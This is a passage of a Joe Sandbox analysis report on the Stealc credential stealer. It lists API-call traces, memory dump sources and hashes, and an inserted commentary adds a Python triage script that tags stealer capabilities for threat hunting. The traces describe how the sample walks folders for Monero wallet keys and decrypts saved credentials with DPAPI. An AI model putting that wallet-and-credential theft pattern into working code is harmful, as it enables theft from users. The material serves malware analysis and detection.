                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 009F7C62
                              • LocalFree.KERNEL32(00000000), ref: 009F7D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 67189adb2af5176991b7de06451532f29284545321da2d1da422d8c009224139
                              • Instruction ID: bde9680a87dcb4a6f9832e371bfc48485c18ab8fc04000257d4fd3db5b01c1d6
                              • Opcode Fuzzy Hash: 67189adb2af5176991b7de06451532f29284545321da2d1da422d8c009224139
                              • Instruction Fuzzy Hash: 51413BB195021CABDB24DB94DC99BFEB378FF44700F204199E60962291DB742F86CFA1
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00A00D73), ref: 009EE4A2
                              • StrCmpCA.SHLWAPI(?,00A014F8), ref: 009EE4F2
                              • StrCmpCA.SHLWAPI(?,00A014FC), ref: 009EE508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009EEBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: ed6d2ca9e1fc7d793905b3a574e3e52d47e8896f9033a19dbeda45068897f805
                              • Instruction ID: 084c3c301cfcad7776387ff4a5a6c82d772f612eda69676dc9884233d72a3bda
                              • Opcode Fuzzy Hash: ed6d2ca9e1fc7d793905b3a574e3e52d47e8896f9033a19dbeda45068897f805
                              • Instruction Fuzzy Hash: 5D122FB191011C9ADB19FB60DC96FFD7378AF94340F4045A9B60E96091EF706F89CBA2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #QSr$]+]N$n`}m$peU^$:~n$|s~
                              • API String ID: 0-2648097665
                              • Opcode ID: 17e2a1484c1986e4a149be27389fcdf42f710dd68022929bf710668904ed44bd
                              • Instruction ID: c340d18ea92a22b9693e1ed928d36fa04732e68ae7ea3681788c665b8446495f
                              • Opcode Fuzzy Hash: 17e2a1484c1986e4a149be27389fcdf42f710dd68022929bf710668904ed44bd
                              • Instruction Fuzzy Hash: 9E9205F360C2049FE304AE2DEC8567AB7E9EF94720F1A493DE6C5C3744EA7558018697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: '[wq$,3</$Ai%X$F^kk$_S?
                              • API String ID: 0-1790768242
                              • Opcode ID: b9bb3c02309c0157a4eb433fff5c52b92416708ac6d30855fa36e6594c751622
                              • Instruction ID: b43e1b6f1051eb2a2046ee633d0cf9814bc536b5f0ab0dc38ebc9890ac902327
                              • Opcode Fuzzy Hash: b9bb3c02309c0157a4eb433fff5c52b92416708ac6d30855fa36e6594c751622
                              • Instruction Fuzzy Hash: 5EB22AF3A0C2009FE304AE2DEC8567AF7D9EF94320F1A463DEAC5D7744E63598058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: *e}$5c?$Dwo.$Yiv^${O%k
                              • API String ID: 0-424722185
                              • Opcode ID: 9589bb60eebf73047947323870f2b3bd006df95b1df0c596a658cd0b7629f79a
                              • Instruction ID: ac5fe71c08a5605081cf97f2046864f24dac5aeee589e9d1aaf6c35f8d926e2d
                              • Opcode Fuzzy Hash: 9589bb60eebf73047947323870f2b3bd006df95b1df0c596a658cd0b7629f79a
                              • Instruction Fuzzy Hash: 22B227F3A0C6149FD3046E2DEC8567AFBE9EF94720F1A4A3DEAC487744E63558018693
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 009EC871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 009EC87C
                              • lstrcat.KERNEL32(?,00A00B46), ref: 009EC943
                              • lstrcat.KERNEL32(?,00A00B47), ref: 009EC957
                              • lstrcat.KERNEL32(?,00A00B4E), ref: 009EC978
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 502a1a34b38406729a6275d0692c78a6b087ca5a4626b4512e9e2aa1f881632a
                              • Instruction ID: 7d43f2d777969b7f5fbd2150715bb6d10ec743b7e6d98a61b88650f6c8f1d74a
                              • Opcode Fuzzy Hash: 502a1a34b38406729a6275d0692c78a6b087ca5a4626b4512e9e2aa1f881632a
                              • Instruction Fuzzy Hash: EE417CB591420EEBCB20CFA0DC89BFEB7B8BB48304F1045A8F509A62C0D7745A85CF91
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 009E724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009E7254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 009E7281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009E72A4
                              • LocalFree.KERNEL32(?), ref: 009E72AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: d17a63c3ccac5e4142e3a78b0362db83afa7ec391ed762131dbab0625580cea6
                              • Instruction ID: 972cbfc88619d214efd734e900ce1e18c3ceb978b1d33cd9a7eae1d13ee38aa1
                              • Opcode Fuzzy Hash: d17a63c3ccac5e4142e3a78b0362db83afa7ec391ed762131dbab0625580cea6
                              • Instruction Fuzzy Hash: 05011275A50208BBDB24DFD4DD46F9D7778EB44B04F104555FB05AB2C0D670AA018B65
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009F961E
                              • Process32First.KERNEL32(00A00ACA,00000128), ref: 009F9632
                              • Process32Next.KERNEL32(00A00ACA,00000128), ref: 009F9647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 009F965C
                              • CloseHandle.KERNEL32(00A00ACA), ref: 009F967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 5b30d3b3fe00d4a269fc1a3f31363f2b66a6e06aab188495b5f13807ab8eaf29
                              • Instruction ID: 38406d9ee327ca01b57c56ddc4f38a75ef0ea559bd2d29bade8f979e93f228dd
                              • Opcode Fuzzy Hash: 5b30d3b3fe00d4a269fc1a3f31363f2b66a6e06aab188495b5f13807ab8eaf29
                              • Instruction Fuzzy Hash: 5C010C75A10208EBCB24DFA5CD48BEDB7F8EB48700F104198AA05D6280DB749B45CF51
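The routines listed above are the behavioural evidence behind the Stealc verdict: a directory walk built on FindFirstFileA/FindNextFileA with a `\*.*` pattern and a subcall that assembles `\Monero\wallet.keys`, a CryptStringToBinaryA base64 decode, a CryptUnprotectData DPAPI decryption (heap buffer, decrypt, WideCharToMultiByte, LocalFree), and a CreateToolhelp32Snapshot/Process32First/Process32Next loop with a StrCmpCA name compare (the same snapshot loop recurs further down in this section). The two StrCmpCA calls immediately after FindFirstFileA against adjacent constants read like the usual "." and ".." skip; that is an inference from the trace, not something the report states. As an added triage helper, not part of the Joe Sandbox report and not code from the sample, the following Python script parses "APIs" lines in the report's own layout, tags each function with a capability label and extracts the path and wildcard arguments worth turning into hunting indicators. The capability names, the API-to-capability mapping and the sample trace (copied from the listings in this section) are mine.

```python
import re

# Constructed sample: API lines in the layout this report uses, copied from the
# function listings in this section (addresses and arguments as printed there).
SAMPLE_TRACE = r"""
APIs
  • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00A00D73), ref: 009EE4A2
• StrCmpCA.SHLWAPI(?,00A014F8), ref: 009EE4F2
• StrCmpCA.SHLWAPI(?,00A014FC), ref: 009EE508
• FindNextFileA.KERNEL32(000000FF,?), ref: 009EEBDF
APIs
• lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 009EC871
• CryptStringToBinaryA.CRYPT32(?,00000000), ref: 009EC87C
• lstrcat.KERNEL32(?,00A00B46), ref: 009EC943
APIs
• GetProcessHeap.KERNEL32(00000008,00000400), ref: 009E724D
• RtlAllocateHeap.NTDLL(00000000), ref: 009E7254
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 009E7281
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009E72A4
• LocalFree.KERNEL32(?), ref: 009E72AE
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009F961E
• Process32First.KERNEL32(00A00ACA,00000128), ref: 009F9632
• Process32Next.KERNEL32(00A00ACA,00000128), ref: 009F9647
• StrCmpCA.SHLWAPI(?,00000000), ref: 009F965C
• CloseHandle.KERNEL32(00A00ACA), ref: 009F967A
"""

# One report line: optional "Part of subcall function <addr>:" prefix, then
# Api.MODULE(arg,arg,...), ref: <addr>
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<subaddr>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[A-Z0-9]+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]+)\s*$"
)

# Capability labels (my naming, not the report's) keyed on the APIs that
# identify them in the listings above. Assumption: these sets are sufficient
# for this family; extend them for other stealers.
CAPABILITIES = {
    "dpapi-decrypt": {"CryptUnprotectData"},
    "base64-decode": {"CryptStringToBinaryA"},
    "process-enum": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "file-walk": {"FindFirstFileA", "FindNextFileA", "FindFirstFileW", "FindNextFileW"},
}

# Arguments worth keeping as artifacts: path fragments and wildcard patterns.
STRING_ARG = re.compile(r"[\\*]")


def parse_trace(text):
    """Split an 'APIs' listing into per-function lists of parsed calls."""
    functions = []
    for line in text.strip().splitlines():
        if line.strip() == "APIs":
            functions.append([])
            continue
        m = LINE_RE.match(line)
        if not m:
            continue  # 'Strings', 'Memory Dump Source' and similar headers
        if not functions:
            functions.append([])
        functions[-1].append({
            "api": m["api"], "module": m["mod"], "ref": m["ref"],
            "args": m["args"].split(","), "subcall": m["subaddr"],
        })
    return functions


def capabilities(calls):
    """Map a function's calls to capability labels and the refs that prove them."""
    apis = {c["api"] for c in calls}
    found = {}
    for label, needed in CAPABILITIES.items():
        hits = apis & needed
        if hits:
            found[label] = sorted(c["ref"] for c in calls if c["api"] in hits)
    return found


def artifact_strings(calls):
    """Path and wildcard arguments seen anywhere in the function, subcalls included."""
    return sorted({a for c in calls for a in c["args"] if STRING_ARG.search(a)})


def triage(text):
    """Per function: first direct call site, capabilities and string artifacts."""
    out = []
    for calls in parse_trace(text):
        caps = capabilities(calls)
        if not caps:
            continue  # nothing stealer-specific in this function
        entry = next((c["ref"] for c in calls if not c["subcall"]), calls[0]["ref"])
        out.append({"entry": entry, "capabilities": caps, "strings": artifact_strings(calls)})
    return out


def profile(text):
    """Union of capabilities across the whole listing."""
    return {label for fn in triage(text) for label in fn["capabilities"]}


if __name__ == "__main__":
    for fn in triage(SAMPLE_TRACE):
        print(fn["entry"], sorted(fn["capabilities"]), fn["strings"])
    print("profile:", sorted(profile(SAMPLE_TRACE)))
```

Run against the full "APIs" blocks of a report, the profile set gives a quick answer to "does this function set look like a credential stealer" (DPAPI decrypt plus process enumeration plus a wallet-path file walk), and the per-function refs point straight at the call sites to inspect in the IDA snapshot. The string artifacts, here `\Monero\wallet.keys` and `\*.*`, are the pieces to carry into file-access hunting rules.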
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 1=Q$nV/$t*.$v}7
                              • API String ID: 0-1156221590
                              • Opcode ID: 51b0838871b41831c07d41da1856dce77a4e7b1238b030b864271d75d0df57c2
                              • Instruction ID: 0fc06d3d70c0a5815ae50562c6dd8734e8e19e3fe113ed838a5d719640a6bb69
                              • Opcode Fuzzy Hash: 51b0838871b41831c07d41da1856dce77a4e7b1238b030b864271d75d0df57c2
                              • Instruction Fuzzy Hash: 40B20AF3A0C2049FE3046E2DEC8577AB7E5EF94720F1A453DE6C5C3744EA3598058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: &mO:$J6M$Qsj$u}Ei
                              • API String ID: 0-3735752871
                              • Opcode ID: 242072a063c7a25a321a1ab9635ab71969325972c5dfb5c5f33b4a96594a975f
